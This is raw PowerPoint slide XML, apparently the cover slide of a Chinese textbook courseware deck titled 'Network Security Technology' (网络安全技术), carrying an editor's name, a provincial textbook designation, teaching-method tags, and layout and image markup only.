                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="39" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="216"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>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 grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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图片 7" descr="V-136038-F72FEC97O"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="4876800" cy="1009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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007BD3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="034373"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin scaled="0"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="3810"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="4021455" cy="301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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56007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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="3219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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岗课赛证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>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2184400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>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3098800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId13"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId15"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId17"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId19"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId21"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId23"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
